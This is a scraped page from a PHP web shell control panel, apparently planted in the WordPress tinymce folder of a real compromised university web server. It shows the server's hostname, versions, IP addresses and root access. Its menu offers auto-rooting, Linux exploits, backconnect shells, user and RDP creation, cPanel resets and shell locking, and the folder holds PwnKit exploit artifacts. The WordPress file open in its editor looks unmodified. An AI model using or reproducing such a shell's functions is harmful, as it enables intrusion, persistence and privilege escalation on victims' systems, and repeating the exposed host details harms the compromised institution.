Linux web-conference.aiou.edu.pk 5.4.0-205-generic #225-Ubuntu SMP Fri Jan 10 22:23:35 UTC 2025 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 3.17.177.248
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
var /
www /
html /
cesa2025 /
wp-includes /
js /
tinymce /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=%2E
[ DIR ]
drwxr-xr-x
langs
[ DIR ]
drwxr-xr-x
plugins
[ DIR ]
drwxr-xr-x
skins
[ DIR ]
drwxr-xr-x
themes
[ DIR ]
drwxr-xr-x
utils
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
license.txt
25.82
KB
-rw-r--r--
pwnkit
10.99
KB
-rw-r--r--
tiny_mce_popup.js
15.61
KB
-rw-r--r--
tinymce.min.js
357
KB
-rw-r--r--
wp-tinymce.js
655.73
KB
-rw-r--r--
wp-tinymce.php
1.02
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : wp-tinymce.php
<?php /** * Not used in core since 5.1. * This is a back-compat for plugins that may be using this method of loading directly. */ /** * Disable error reporting * * Set this to error_reporting( -1 ) for debugging. */ error_reporting( 0 ); $basepath = __DIR__; function get_file( $path ) { if ( function_exists( 'realpath' ) ) { $path = realpath( $path ); } if ( ! $path || ! @is_file( $path ) ) { return false; } return @file_get_contents( $path ); } $expires_offset = 31536000; // 1 year. header( 'Content-Type: application/javascript; charset=UTF-8' ); header( 'Vary: Accept-Encoding' ); // Handle proxies. header( 'Expires: ' . gmdate( 'D, d M Y H:i:s', time() + $expires_offset ) . ' GMT' ); header( "Cache-Control: public, max-age=$expires_offset" ); $file = get_file( $basepath . '/wp-tinymce.js' ); if ( isset( $_GET['c'] ) && $file ) { echo $file; } else { // Even further back compat. echo get_file( $basepath . '/tinymce.min.js' ); echo get_file( $basepath . '/plugins/compat3x/plugin.min.js' ); } exit;
Close